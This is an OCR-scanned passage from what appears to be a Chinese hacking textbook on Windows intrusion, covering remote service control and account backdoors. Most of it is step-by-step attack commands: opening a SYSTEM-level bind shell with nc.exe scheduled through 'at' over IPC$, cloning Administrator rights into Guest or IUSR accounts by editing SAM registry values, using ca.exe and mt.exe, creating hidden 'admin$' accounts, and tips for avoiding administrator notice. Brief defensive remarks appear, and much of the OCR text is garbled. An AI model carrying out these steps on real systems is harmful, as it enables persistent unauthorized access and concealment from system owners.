SERVICE EXIT CODE : 0 (0x0) 

CHECKPOINT : 0x0 

WAIT _HINT : 0x7d0 

PID : 1336 

FLAGS : 


输出 信息 中 的 STATE 项 的 值 为 2START_PENDING) ,说 明 终 端 服务 正在 启动 过 程 
中 。 由 于 发 布 服务 启动 指令 到 服务 最 终 启 动 成 功 是 需要 一 定 的 时 间 的 ,因此 ,可 稍 等 一 会 儿 
再 重新 查询 该 服务 的 启动 状态 ,从 而 了 解 服务 的 最 终 启 动 状态 。 


F:\hacktool > sc \\192.168. 6.73 query termservice 
SERVICE_NRME: termservice 


TYPE : 10 WIN32_OWN_PROCESS 

STRTE : 4 RUNNING 
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) 

WIN32_EXIT CODE :0 (0x0) 

SERVICE_EXIT_CODE : 0 (0x0) 

CHECKPOINT : 0x0 

WAIT_HINT : 0x0 


输出 信息 中 的 STATE 项 的 值 为 4(RUNNING) ,说 明 终端 服务 启动 成 功 。 如 果 此 时 查 
询 出 来 的 STATE 项 目的 值 仍 是 2(START_PENDING), 则 说 明 终端 服务 并 未 启动 成 功 ， 
这 种 情况 一 般 是 目标 主机 的 终端 服务 组 件 未 安装 ,导致 无 法 启动 成 功 。 

@ 停止 服务 。 

命令 用 法 : sc \\ip_address stop service_name 

例如 , 若 要 停止 192. 168. 6. 73 主机 的 终端 服务 , 则 实现 的 命令 为 : sc \\192.168.6.73 


stop termservice 


24 账户 后 门 


在 首次 入 侵 目 标 主 机 成 功 后 ,攻击 者 为 方便 下 次 人 侵 ,通常 会 在 目标 主机 安置 永久 性 的 
后 门 木 马 程序 ,并 创设 账户 后 门 。 设 置 账户 后 门 通常 有 两 种 方式 ,一 是 将 系统 管理 员 账 户 
(Administrator) 克隆 到 目标 主机 已 存在 的 某 一 个 账户 (比如 Guest 或 Internet 匿名 账户 ); 
第 二 种 方式 是 创建 一 个 隐藏 的 账户 ,并 将 管理 员 账 户 克隆 到 该 隐藏 账户 。 账 户 后 门 设置 成 
功 后 ,攻击 者 以 后 就 可 使 用 该 后 门 账户 很 轻松 地 再 次 入侵 和 控制 目标 主机 了 。 

因此 ,作为 管理 人 员 ,应 经 常 检 查 系统 是 否 存在 木马 病毒 或 恶意 程序 ,并 经 常 性 地 检查 
系统 的 账户 和 用 户 组 。 对 于 是 否 存在 隐藏 账户 的 检查 ,相对 要 麻烦 一 些 。 可 以 通过 检查 系 
统 的 登录 日 志 看 是 否 有 在 检查 系统 账户 时 没有 发 现 ,而 在 系统 登录 日 志 中 又 有 该 账户 登录 
成 功 的 记录 来 判断 。 更 准确 的 检查 方法 是 利用 创建 克隆 账户 和 隐藏 账户 所 讲 的 方法 ,通过 
检查 注册 表 来 判断 系统 是 否 存在 克隆 账户 和 隐藏 账 户 。 

本 节 介 绍 克隆 系统 账户 和 隐藏 系统 账户 , 意 在 让 读者 明白 Windows 的 系统 账户 是 可 以 
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被 克隆 和 隐藏 的 ,在 以 后 的 系统 账户 管理 中 ,要 注意 检查 自己 的 系统 是 否 存在 这 类 安全 
问题 。 


2.4.1 克隆 系统 账户 


1. 账户 克隆 原理 简介 

在 微软 Windows 操作 系统 中 ,操作 系统 的 账户 信息 (账户 属性 、 权 限 、 密 码 等 ) 保 存在 
SAM( Security Account Manager) 数 据 库 文件 中 ,该 文件 位 于 winnt\system32\config 文件 
夹 中 。 

SAM 数据 库 文件 的 内 容 对 应 于 注册 表 的 HKEY_LOCAL_MACHINE\SAM\SAM\ 
分 支 下 的 内 容 。 由 于 SAM 关系 到 整个 操作 系统 的 账户 安全 ,因此 操作 系统 规定 只 有 拥有 
SYSTEM 权限 的 进程 或 用 户 才能 访问 注册 表 SAM 分 支 下 的 内 容 。 即 使 是 管理 员 ,直接 使 
用 注册 表 编 辑 器 (regedit) 来 访问 SAM 分 支 , 也 无 法 查看 和 访问 其 下 的 内 容 。 

Windows 操作 系统 的 账户 有 一 个 账户 显示 名 称 ( 账 户 名 ) 和 一 个 SID (Security 
Identifiers ,安全 标识 符 ) 值 。SID 唯一 地 标识 了 该 账户 ,用 户 名称 更 改 时 ,其 对 应 的 SID 是 
不 变 的 。 删 除 一 个 账户 后 ,再 创建 一 个 同名 的 账户 ,新 创建 出 的 这 个 账户 的 SID 值 与 以 前 
的 同名 账户 的 SID 值 是 不 相同 的 。 操 作 系统 进程 引用 的 也 是 账户 的 SID, 而 不 是 账户 的 显 
示 名 称 。 

在 Windows 2000/XP/2003 和 Windows NT 里 ,默认 管理 员 账 号 的 SID 值 是 固定 的 
500(Oxlf4) 。 

在 注册 表 中 ,有 两 处 保存 了 账户 的 SID 值 , 一 处 是 HKEY_LOCAL_MACHINENSAMN 
SAMN Domains Account \ Users 分 支 下 的 子 键 名 , 另 一 处 是 该 子 键 的 F 子 项 的 值 。 
Windows 系统 登录 时 使 用 的 是 下 子 键 的 值 ,查询 账户 (账户 管理 器 或 命令 行 中 执行 net user 
命令 ) 时 使 用 的 是 前 者 。 利 用 这 一 特点 ,可 人 为 造成 账户 这 两 处 存储 的 SID 值 不 相同 。 比 
如 ,车 用 Administrator 子 键 的 F 子 项 的 值 覆盖 其 他 账户 的 下 子 项 的 值 , 而 保持 Users 分 支 
下 的 子 键 名 的 SID 值 不 变 ,这 时 就 会 造成 账户 在 系统 登录 时 具有 管理 员 的 权限 ,但 在 账户 
管理 器 中 查询 显示 出 的 仍 是 账户 原来 的 属性 ,这 样 就 可 实现 账户 克隆 。 

可 通过 手工 操作 来 实现 账户 克隆 .也 可 利用 相关 工具 软件 (如 ca. exe) 来 自动 实现 。 

2. 使 用 图 形 界面 手工 克隆 账户 

下 面 以 将 Administrator 账户 克 降 到 Guest 账户 为 例 , 介 绍 手工 克隆 账户 的 方法 。 

(1) 设置 Guest 账户 的 密码 (如 设置 为 24361) ,方便 以 后 利用 Guest 账户 登录 。 

(2) 使 用 regedt32. exe 编辑 修改 注册 ,提升 管理 员 账户 对 SAM 的 访问 权限 。 

在 目标 主机 的 命令 行 执行 regedt32. exe 命令 ,打开 注册 表 编 辑 器 ,如 图 2. 13 所 示 。 

选中 HKEY_LOCAL_MACHINE\SAM\SAM, 然 后 选择 “安全 ”一 “权限 ”菜单 项 , 打 
开 对 SAM 的 权限 设置 对 话 框 ,如 图 2. 14 所 示 。 

设置 Administrators 对 SAM 有 “完全 控制 ”权限 ,最 后 单 击 “ 确 定 ” 按 钮 完成 对 权限 的 
设置 ,之 后 管理 员 就 可 利用 regedit. exe 注册 表 编 辑 器 ,来 实现 对 注册 表 中 的 SAM 键 值 的 
编辑 修改 了 。 

(3) 使 用 regedit. exe 注册 表 编 辑 器 ,进行 账户 克隆 操作 。 

O 在 目标 主机 命令 行 运行 regedit. exe 时 .启动 注册 表 编 辑 器 。 
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图 2.13 打开 注册 表 编 辑 器 


图 2.14 设置 管理 员 对 SAM 子 键 的 访问 权限 


@ 依次 展开 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ Account \ Users\ 
Names 分 支 ,其 展开 后 的 情况 如 图 2. 15 所 示 。 从 图 中 可 见 ,Names 分 支 下 的 各 子 键 的 名 称 
就 是 账户 的 名 称 ,该 子 键 的 内 容 就 是 该 账户 对 应 的 SID 值 ,比如 Administrator 账户 的 SID 
值 为 0x1f4。 而 在 Users 分 支 下 面 .就 有 以 这 些 SID 值 命名 的 子 键 ,其 子 键 下面 的 下 数据 项 
的 值 ,就 记录 了 账户 的 权限 信息 ,如 图 2. 16 所 示 。 

© 在 图 2. 16 所 示 的 窗口 中 ,选中 “000001F4”(Administrator) 子 键 ,然后 双击 右边 窗口 
中 的 下 数据 项 ,此 时 将 打开 “编辑 二 进 制 数值 ”对 话 框 ,如 图 2. 17 所 示 。 

用 鼠标 拖 选 的 方式 ,将 其 中 的 数值 选中 .然后 在 选中 的 数值 区 域 右 击 , 在 弹出 的 快捷 菜 
单 中 选择 “复制 "选项 ,将 数值 复制 到 剪贴 板 。 
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ET 


TARO RRO FEV BAO EMH 


E FUE | 
arw ox (长度 为 地 的 二 进位 值 ) 


— aa siis 到 

| 怠 的 电脑 \HKEY_LOCAL_MACHINE\SAMSAMiDomans\Account\Users\Names\Admnistrator Z 
图 2.15 展开 后 的 SAM 分 支 

= [D| xl 


EERO RKO FEV KRO HHH 


s — JG 
REG_SZ WARR) 

REG_BINARY 02 00 01 00 00 00 00 0056 c 
REG_BINARY 00 00 00 00 a8 00 00 00 02 0! 


图 2. 17 “编辑 二 进 制 数值 ”对话 框 
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@ 在 图 2. 16 所 示 的 窗口 中 ,选中 “Guest” 子 键 ,查看 Guest 账户 的 SID 值 ,从 查看 结果 
可 知 其 SID 值 为 0x1f5。 

© 在 Users 分 支 下 选中 “000001F5” 子 键 ,在 右 侧 窗 口中 双击 下 数据 项 ,在 弹出 的 “编辑 
二 进 制 数值 ?对 话 框 中 ,将 其 中 的 数值 全 部 选中 ,然后 在 选中 的 数值 区 域 右 击 , 在 弹出 的 快捷 
菜单 中 选择 “粘贴 ?选项 ,然后 单 击 对 话 框 中 的 “确定 ?按钮 ,完成 对 下 数据 项 值 的 替换 修改 ， 
从 而 完成 对 账户 的 克隆 操作 。 

(4) 结束 regedit. exe 注册 表 编 辑 器 的 运行 。 使 用 regedt32. exe 编辑 修改 注册 表 ,取消 
第 (2) 步 设置 的 管理 员 组 对 SAM 的 完全 访问 权限 .使 系统 恢复 原状 。 

(5) 测试 验证 克隆 账户 及 其 权限 

假设 进行 了 账户 克隆 的 目标 主机 的 IP 地 址 为 192. 168. 6.73, 在 IP 地址 为 192. 168. 6. 72 
的 测试 机 上 对 其 进行 IPC $ 连接 和 访问 权限 测试 。 

O 在 192.168.6.72 主机 的 命令 行 ,使 用 net use 命令 与 IP 地 址 为 192. 168. 6. 73 的 目 
标 主机 建立 IPC$ 连接 。 


C:\> net use \\192. 168. 6.73\ipc $ 24361 /user:guest 

TO PÑ pÀ o 

@ 复制 F:\hacktool\CleanlISLog. exe 文件 到 目标 主机 的 admin $ 共享 资源 的 位 置 , 若 
能 复制 成 功 , 则 说 明 Guest 账户 有 足够 大 的 权限 ,账户 克隆 成 功 

操作 命令 及 其 操作 结果 如 图 2. 18 所 示 , 从 中 可 见 , 账 户 克 隆 成 功 


1: 
T 


caes 


[ m sose 


SM92-468- 79 ise6 24061 /eaeriguaet Ë 


|F: Yead hacktool 


|P: Shacktoo1>copy cleaniislog.exe \\192.168.6.73\adnin$ 
1 个 文件 。 


图 2.18 利用 克隆 账户 登录 连接 目标 主机 


以 上 对 克隆 账户 的 验证 采取 的 是 建立 远程 连接 的 方式 ,另外 ,也 可 采取 在 目标 主机 本 地 
使 用 克隆 账户 登录 系统 ,然后 查看 其 桌面 是 否 和 管理 员 相同 ,能 和 否 创 建 其 他 账户 来 验证 克隆 
是 否 成 功 。 

© 查看 克隆 账户 的 属性 信息 ,检查 账户 克隆 后 属性 是 否 有 变化 。 

在 目标 主机 的 命令 行 , 执 行 net user guest 命令 ,查看 克隆 账户 的 属性 ,其 显示 结果 如 
图 2.19 所 示 。 

从 输出 结果 可 见 ,Guest 账户 仍 属于 Guests 用 户 组 ,并 不 属于 Administrators 用 户 组 。 
在 账户 管理 界面 中 ,查看 Administrators 账户 组 的 成 员 , 或 在 命令 行 执行 net localgroup 
administrators 命令 查看 管理 员 组 的 成 员 ,都 不 会 显示 出 Guest 克隆 账户 。 因 此 ,管理 员 根 
据 该 账户 的 属性 或 查看 Administrators 用 户 组 无 法 判断 出 Guest 已 具有 管理 员 权 限 , 是 一 
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[E> C\wINDOWS\System32\cmd exe 


Guest 
供 来 宾 访问 计算 机 或 访问 域 的 内 置 帐户 
we 《系统 默认 值 > 

2888/12/1 上 午 @9:55 

2888/12/1 上 午 89:55 

Yes 


No 


air 


281876720 下 午 05:17 


anl 


“Hone 


图 2.19 查看 克隆 账户 Guest 的 属性 


个 克隆 账户 

(6) 禁用 克隆 账户 ,使 账户 具有 更 好 的 隐藏 性 

由 于 Guest 账户 默认 情况 下 是 禁用 的 ,管理 员 通 常 也 会 禁用 该 账户 。 激 活该 账户 会 引 
起 管理 员 的 警惕 Tis A EA RENI 上 者 通常 也 会 禁用 该 账户 。 从 中 可 见 , 在 
平时 对 账户 的 安全 检查 中 ,对 于 被 禁用 的 账户 也 不 能 放松 警惕 

禁用 Guest 账户 一 定 要 通过 命令 行 执行 net user 命令 来 操作 ,不 要 通过 图 形 界面 的 管 
理 器 来 操作 。 若 能 对 目标 主机 进行 本 地 操作 ,可 在 目标 主机 的 命令 行 执行 net user guest 
岗 。 如 果 不 能 接触 到 目标 主机 ,可 通过 获得 目标 主机 的 远程 Shell 来 执行 。 

将 目标 主机 的 Guest 禁用 后 ,使 用 net user guest 命令 或 在 账户 管理 的 图 形 界面 ,看 到 
的 结果 是 账户 被 禁用 ,但 由 于 Guest 已 被 克隆 成 Administrator 账户 .Administrator 账户 是 

不 能 被 禁用 的 ,因此 Guest 克隆 账户 实际 上 仍 是 能 正常 登录 和 建立 远程 连接 的 。 

将 克隆 账户 Guest 禁用 后 .在 本 地 机 (192. 168. 6. 72) 上 执行 “net use \\192. 168. 6 
del" 命 令 , 断 开 刚 才 测 i ZAJ IPCS i 然后 重新 利用 被 禁用 的 Guest 账户 来 建立 
IPC $ 连接 ,检查 是 否 还 能 建立 正常 的 连接 。 测 试 结果 证 明 ,被 禁用 的 克隆 账户 仍 能 登录 系 
统 和 建立 远程 连接 ,如 图 2. 20 所 示 


active:no 来 实 


F:Shacktool>net use Sui 168.6.73 /del 
NS192.168.6.73 已 经 出 | 


|F: Shacktoo1D>net use \\192.168.6.73\ipe$ 24361 /user:guest 


IF: Shacktoo1>_ 
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到 此 为 止 ,Guest 克隆 账户 创建 成 功 ,攻击 者 就 可 随时 使 用 Guest 账户 登录 和 控制 目标 
IT. 

3. 使 用 命令 行 手工 克隆 账户 

前 面 介 绍 的 手工 克隆 账户 的 操作 ,对 注册 表 的 操作 部 分 ,是 在 目标 主机 中 使 用 注册 表 编 
辑 器 以 图 形 化 界面 来 操作 完成 的 。 但 在 实际 攻击 人 侵 的 过 程 中 ,常常 是 无 法 直接 操作 目标 
主机 的 图 形 化 界面 的 ,除非 能 获得 目标 主机 的 远程 桌面 。 

由 于 注册 表 是 可 以 通过 命令 行 导 入 导出 的 ,因此 攻击 者 也 可 以 通过 命令 行 对 注册 表 进 
行 导入 或 导出 的 方式 ,来 实现 账户 的 远程 克隆 操作 。 

(1) 利用 所 获得 的 目标 主机 的 账户 和 密码 ,与 远程 目标 主机 建立 IPC $ 连接 。 然 后 利 
用 前 面 介绍 的 方法 获得 远程 主机 的 Shell 命令 行 ,操作 命令 如 下 : 

F:\hacktool > net use NN192.168.6.73Vipc $ letmein /user:administrator 

命令 成 功 完成 。 

F:\hacktool > copy nc. exe NN192. 168.6. 73Nadmin $ 

已 复制 1 不 文件 。 


F:\hacktool > net time \\192. 168. 6.73 
\\192.168.6.73 的 当前 时 间 是 2010/6/20 22:38:40 


命令 成 功 完成 。 

F:\hacktool >at NN192.168.6.73 22:41:00 nc - 1 - p 8080 - e cnd. exe 

新 加 了 一 项 作业 ,其 作业 ID = 1 

F:\hacktool > nc 192. 168. 6. 73 8080 

Microsoft Windows 2000 [Version 5.00. 2195] 

(C) 版 权 所 有 1985 - 1998 Microsoft Corp. 

C:\WINDONS\ system32 > 

由 于 该 远程 Shell 是 通过 计划 任务 的 执行 而 获得 的 ,因此 该 Shell 是 以 System 账户 的 
权限 运行 的 。 在 该 命令 行 执行 regedit. exe 注册 表 编 辑 器 时 ,也 是 以 System 账户 的 身份 运 
行 的 ,具有 对 注册 表 的 SAM 键 的 存 取 访问 能 力 。 

(2) 执行 “net user” 命 令 ,获得 Internet 匿名 账户 的 具体 名 称 。 


C:\WINDOWS\ system32 > net user 


NN 的 用 户 账户 
Administrator Guest IUSR_WIN2K - 4607BGJNR 
IWAM_WIN2K - 4607BGJNR TsInternetUser 


命令 运行 完毕 ,但 发 生 一 个 或 多 个 错误 。 

由 于 Guest 账户 是 克隆 的 Administrator 账户 ,在 远程 Shell 中 执行 net user 命令 时 提 
示 有 错误 ,可 忽略 不 管 。 在 远程 主机 的 本 地 Shell 中 执行 net user 时 ,不 会 报错 误 提示 ,因此 
远程 主机 的 系统 管理 员 是 发 现 不 了 的 。 

(3) 在 远程 Shell 命令 行 ,使 用 带 “/e” 参 数 的 regedit. exe 命令 ,将 管理 员 账 户 的 
“000001F4” 键 和 Internet 匿名 账户 的 *IUSR_WIN2K-4607BGJNR” 键 导出 到 指定 的 注册 表 
文件 中 。 
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regedit. exe 程序 位 于 windows 或 winnt 目录 中 ,执行 “导出 ”命令 之 前 , 先 返回 到 
C:\windows 目录 ,然后 在 命令 行 执行 以 下 命令 : 
regedit /e admin. reg HEEY LOCAL MACHINE\SAM\SAM\Domains\Account\Users\000001F4 


regedit /e iusr_id. reg HKEY LOCAL, MACHINE\SAM\SAM\Domains\Account\Users\Names\ IUSR_WIN2K — 4607BGJNR 


下 面 查看 是 否 生成 了 注册 表 文 件 ,操作 命令 及 其 结果 如 下 所 示 : 


C:VWINDOWS> dir x .reg 
驱动 器 C 中 的 卷 没 有 标签 
卷 的 序列 号 是 70DA — 0C3E 
C:\WINDOWS 的 目录 


2010 - 06 - 20 23:36 4,002 admin. reg 
2010 - 06 - 20 23:39 270 iusr_id.reg 
2 个 文件 4,272 字 节 


0 个 目录 6,755,618,816 可 用 字 节 
根据 输出 结果 可 见 , 注 册 表 导出 成 功 。 
(4) 在 本 地 主机 的 命令 行 ,执行 以 下 命令 ,将 远程 主机 导出 的 注册 表 文 件 下 载 回 本 地 主机 。 


F:\hacktool > copy \\192. 168. 6. 73\admin $ \admin. reg f :\hacktoo1\ 
F:\hacktool > copy \\192. 168. 6. 73\admin $ \ iusr_id. reg f:\hacktool\ 


(5) 在 本 地 主机 使 用 记事 本 打开 iusr_id. reg 文件 ,其 内 容 如 下 所 示 。 


Windows Registry Editor Version 5. 00 
[HKEY_LOCAL, MACHINE\ SAM\ SAM\ Domains\Account\Users\Names\ IUSR_WIN2K - 4607BGJNR] 
@ = hex(3e9): 


根据 其 内 容 *“hex(3e9)" 可 知 ,IUSR_WIN2K-4607BGJNR 用 户 的 SID 值 为 0x3e9, 要 导 
出 Internet 匿名 账户 (IUSR_WIN2K-4607BGJNR) 的 权限 信息 ,就 应 该 导出 以 下 键 的 相关 
数据 。 


HKEY_LOCAL MACHINE\SAM\ SAM\Domains\Account\Users\000003E9 

(6) 在 远程 Shell 的 命令 行 .导出 “000003E9” 键 值 数据 到 3E9. reg 文件 中 。 

C:\WINDOWS > regedit /e 3E9. reg HKEY_LOCAL_MACHINE\ SAM\ SAM\ Doma ins\ Account \Users\000003E9 

(7) 在 本 地 主机 的 命令 行 .执行 以 下 命令 .将 3E9. reg 文件 下 载 回 本 地 主机 。 

F :\hacktool > copy NN192. 168.6.73\admin $ \3E9. reg f:\hacktool\ 

(8) 用 记事 本 同时 将 admin. reg 和 3E9. reg 文件 打开 ,用 admin. reg 文件 中 下 数据 项 
的 值 ,替换 3E9. reg 文件 中 的 下 数据 项 的 值 ,然后 保存 修改 后 的 3E9. reg 文件 。 


admin. reg 文件 的 内 容 及 其 下 数据 项 的 值 如 图 2. 21 所 示 。 
(9) 在 本 地 主机 的 命令 行 , 将 修改 后 的 3E9. reg 文件 上 传 到 远程 目标 主机 。 


F :\hacktool > copy 3E9. reg \\ 192. 168. 6. 73\admin $ 
(10) 在 远程 Shell 的 命令 行 , 将 3E9. reg 注册 表 文 件 导入 注册 表 。 实 现 的 操作 命令 如 下 : 


C:\WINDOWS > regedit /s 3E9. reg 
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Jisan ns => 


S admin.reg -记事 地 Erm] 
XHA RRE ERO EEV EWH 
Windows Registry Editor Version 5. 00 = 


V 00, 00, 00, 00, a8, 00, 00, 00, 02, 00, 01, 00, a8, 00, 00, 00, 1a, 00, 00, 00, 00, 00, 00, \ 
00, c4, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, c4, 00, 00, 00, 1a, 00, 00, 00, 00, 00, 00, 00, \ 
e0, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, e0, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, e0, X 
00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, e0, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, e0, 00, X 
00, 00, 00, 00, 00, 00, 00, 00, 00, 00, c0, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, e0, 00, 00, X 
00, 00, 00, 00, 00, 00, 00, 00, 00, e0, 00, 00, 00, 15, 00, 00, 00, a8, 00, 00, 00, f8, 00, 00, 00, \ 
08, 00, 00, 00, 01, 00, 00, 00, 00, 01, 00, 00, 14, 00, 00, 00, 00, 00, 00, 00, 14, 01, 00, 00, 14, X 


00, 02, 00, 1c, 00, 01, 00, 00, 00, 02, c0, 14, 00, 44, 00, 05, 01, 01, 01, 00, 00, 00, 00, 00, 
00, 00, 00, 00, 02, 00, 58, 00, 03, 00, 00, 00, 00, 00, 14, 00, Sb, 03, 02, 00, 01, 01, 00, 00, 
00, 00, 01, 00, 00, 00, 00, 00, 00, 18, 00, ff, 07, Of, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 
00, 00, 20, 02, 00, 00, 00, 00, 24, 00, 44, 00, 02, 00, 01, 05, 00, 00, 00, 00, 00, 05, 15, 00, 


20, 00, 00, 00, 20, 02, 00, 00, 01; 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 41, \ 
00, 64, 00, 64, 00, 69, 00, 6e, 00, 69, 00, 73, 00, 74, 00, 72, 00, 61, 00, 74, 00, 6f, 00, 72, 00, \ 
00, 00, a Tb, 06, 74, al, 8b, 97, Tb, 3a, 67, 28, 00, df, 57, 2' 00, 84, 76, 85, 51, 6e, T£, 10, X 

2, 00, 00, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, \ 


5e, 3' 

ff, an, i f2, 01, 02, 00, 00, 07, 00, 00, 00, 01, 00, 01, 00, b6, 2c, 56, 01, 99, 8d, e8, 81, 2c, Ñ 
aa, 4c, £2, 58, 2f, 48, 30, 01, 00, 01, 00, de, e8, 73, 19, 17, 74, 99, 06, b4, d2, 35, 29, a5, 5a, \ 
08, 54, 01, 00, 01, 00, 01, 00, 01, 00 


图 2.21 Administrator 账户 下 数据 项 的 值 


注册 表 成 功 导 入 后 ,账户 克隆 也 就 成 功 了 。 
(11) 在 远程 Shell 的 命令 行 ,执行 以 下 命令 ,修改 Internet 匿名 账户 的 密码 ,以 方便 以 
后 使 用 该 账户 和 密码 登录 连接 和 入 侵 目 标 主机 。 


C:\WINDOWS > net user IUSR_WIN2K - 4607BGJNR 24361 


(12) 验证 IUSR_WIN2K-4607BGJNR 24361 克隆 账户 。 

在 远程 Shell 命令 行 按 Ctrl 十 C 键 ,结束 远程 Shell。 在 本 地 主机 的 命令 行 执行 net use 
x* /del 命令 ,删除 原来 建立 的 IPC $ 连接 。 然 后 执行 以 下 命令 ,重新 以 IUSR_WIN2K- 
4607BGJNR 24361 账户 建立 与 远程 目标 主机 的 IPC $ 连接 。 


F:\hacktool >net use \\192. 168.6.73\ipc $ 24361 /user:IUSR_WIN2K - 4607BGJNR 

命令 成 功 完成 。 

F:\hacktool > copy cleaniislog. exe \\192. 168. 6. 73\admin $ 

覆盖 \\192. 168. 6. 73\admin $ \CleanIISLog. exe Mi}? (Yes/No/All): y 

已 复制 个 文件 

从 中 可 见 , 利 用 IUSR_WIN2K-4607BGJNR 账户 ,能 与 远程 目标 主机 建立 远程 连接 ,能 
复制 写 入 文件 ,说 明 有 写 权限 。 在 正常 情况 下 .Internet 匿名 账户 的 权限 很 低 , 对 这 个 目录 
不 会 有 写 权 限 ,说 明 账户 克隆 成 功 。 

使 用 这 种 方式 创建 的 克隆 账户 ,不 管 是 执行 net user 命令 查看 账户 属性 、 查 看 管理 员 用 
户 组 的 成 员 列 表 , 还 是 使 用 图 形 界面 的 用 户 管理 器 .都 无 法 看 出 异样 ,具有 很 好 的 隐蔽 性 。 

4. 使 用 工具 软件 进行 账户 克隆 

能 实现 账户 克隆 的 工具 软件 主要 有 ca. exe 和 mt. exe, 
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(1) 利用 ca 克隆 账户 

ca(Clone Administrator) 是 一 款 克 隆 软件 ,可 实现 对 远程 目标 主机 的 账户 进行 克隆 。 

用 法 : ca \\ip_address admin_account admin_pwd clone_account clone_pwd 

参数 说 明 : ip_address 代表 要 克隆 账户 的 目标 主机 的 IP 地 址 ; admin_account 为 目标 
主机 中 具有 管理 员 权 限 的 账户 名 称 .admin_pred 为 该 账户 对 应 的 密码 ; clone_account 为 要 
克隆 到 的 账户 的 名 称 ,clone_prwd 为 要 克隆 到 的 账户 的 密码 。 

例如 ,车 远程 目标 主机 的 IP 地 址 为 192. 168. 168. 231, 其 Administrator 账户 的 密码 为 
letmein, 现 要 求 将 Administrator 账户 克隆 到 IUSR_WIN2K 账户 ,克隆 账户 的 密码 设置 为 
24361。ca. exe 程序 位 于 客户 机 的 D:\hacktool\ca 目录 中 。 

进入 客户 机 的 命令 行 ,然后 进入 D:\hacktool\ca 目录 ,执行 以 下 命令 实现 账户 的 克隆 
操作 。 

D:\hacktool\ca > ca \\192. 168.168. 231 administrator letmein IUSR_WIN2K 24361 

Shadow Administrator, by netXeyes 2002/04/28 

Written by netXeyes 2002, dansnow@21cn. com 

Connect 192.168.168.231 ...OK 


Get SID of IUSR_WIN2K ...OK 
Prepairing ...0K 


Processing ...0K 

Clean Up .OK 

根据 输出 信息 可 知 ,账户 克隆 成 功 。 从 中 可 见 ,给 管理 员 账 户 设置 一 个 强壮 的 密码 并 妥 
善 保管 好 ,对 于 操作 系统 的 安全 是 多 么 的 重要 。 

(2) 使 用 mt 克隆 账户 

mt. exe 是 一 款 功能 非常 强大 的 、 基 于 命令 行 的 网 络 工 具 软 件 , 可 以 实现 进程 和 服务 的 
管理 ,日 志清 除 、 克 隆 账户 检查 用 户 、 直 接 显示 用 户 登录 密码 等 众多 功能 。 不 足 之 处 是 该 软 
件 比 较 陈旧 ,只 能 运行 在 Windows 2000 系统 中 。 

车 要 利用 mt 克隆 账户 , 则 必须 以 System 账户 的 权限 运行 才能 正常 工作 ,否则 会 因 无 
法 存 取 SAM 而 导致 操作 失败 。 可 先 获得 目标 主机 的 远程 Shell, 然 后 在 远程 Shell 中 运行 
mt 进行 克隆 操作 。 

克隆 账户 使 用 带 “-clone” 参 数 的 命令 来 实现 ,其 命令 用 法 为 : 


mt 一 clone admin_account clone_account 


例如 , 若 要 将 192. 168. 168. 231 目标 主机 的 Administrator 账户 克隆 到 Guest 账户 ,并 
设置 Guest 账户 的 密码 为 24361. 

首先 以 计划 任务 的 方式 ,在 目标 主机 执行 “nc -1 -p 8080 -e cmd. exe” 命 令 , 命 令 执 行 后 ， 
在 客户 端 命令 行 执行 “nc 192. 168. 168. 231 8080” 命 令 ,获得 目标 主机 的 远程 Shell, 然 后 在 
远程 Shell 的 命令 行 执 行 以 下 操作 : 

C:\WINNT> mt - clone administrator guest 

Read value F from 1F4 of administrator. 


Set value F to 1F5 of guest 
Success! 
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根据 输出 信息 可 见 , 账 户 克隆 操作 成 功 。 下 面 设置 Guest 账户 的 密码 。 


C:\WINNT > net user guest 24361 
命令 成 功 完成 。 
2.4.2 创建 隐藏 账户 


除了 可 创建 克隆 账户 来 隐藏 账户 的 权限 提升 之 外 ,攻击 者 通常 还 会 通过 创建 隐藏 账户 
或 隐藏 的 克隆 账户 来 进一步 提高 对 账户 的 隐蔽 性 。 

下 面 以 纯 命 令 行 操作 的 方式 ,实现 在 远程 目标 主机 (192. 168. 6. 73) 创建 一 个 隐藏 的 
admin 账户 ,并 将 Administrator 克 降 到 该 隐藏 账户 。 

(1) 获得 远程 目标 主机 的 Shell 命令 行 。 

F:Nhacktool > net use \\192.168.6.73\ipc $ letmein /user:administrator 

F:Nhacktool > copy nc. exe NN192. 168.6. 73\admin $ 

F :\hacktool > net time \\192.168.6.73 

\\192.168.6.73 的 当前 时 间 是 2010/6/22 21:56:12 

F:\hacktool > at \\192.168.6.73 21:59:00 nc -1 -p8080 -ecnd.exe 

F:\hacktool > nc 192. 168. 6.73 8080 

Microsoft Windows 2000 [Version 5.00.2195] 

(C) 版 权 所 有 1985 - 1998 Microsoft Corp. 

C:\WINDOWS\ system32 > 


(2) 在 远程 Shell 的 命令 行使 用 net user 命令 ,创建 admin $ 账户 ,并 设置 密码 
为 24361。 


C:\WINDOWS\ system32 > net user admin $ 24361 /add 


在 创建 账户 时 ,在 账户 名 后 面 添加 一 个 " $ "符号 ,该 账户 在 命令 行使 用 net user 命令 查 
看 用 户 列表 时 ,该 账户 不 会 被 显示 出 来 。 但 在 图 形 界面 的 用 户 管理 器 中 ,仍然 可 查看 到 该 
账户 。 

(3) 利用 前 面 介绍 的 方法 ,将 Administrator 和 admin $ 账户 的 注册 表 信 息 导出 ,编辑 
修改 后 再 上 传 回 远程 目标 主机 。 

在 获得 的 远程 主机 的 Shell 命令 行 ,执行 以 下 操作 导出 注册 表 。 

C: VWINDONSN system32 > cd .. 

C:\WINDOWS > regedit /e admin. reg HKEY LOCAL MACHINE\SAM\SAM\Domains\Account\Users\000001F4 

C: WINDOWS > regedit /e myadmin. reg HKEY_LOCAL_ MACHINE\SAM\ SAM\ Doma ins\ Account Users\ Names\ 

admin $ 

在 攻击 者 的 本 地 命令 行 , 执 行 以 下 命令 .将 导出 的 注册 表 文件 ,下 载 回 本 地 主机 。 

F:\hacktool > copy NN192. 168.6.73\admin $ \admin. reg f :\hacktool 

